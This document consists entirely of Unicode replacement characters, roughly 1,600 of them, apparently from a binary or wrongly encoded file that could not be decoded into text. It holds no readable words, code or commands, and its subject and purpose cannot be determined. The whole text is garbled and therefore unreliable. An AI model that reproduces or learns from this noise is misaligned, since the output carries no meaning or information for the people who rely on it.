�����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������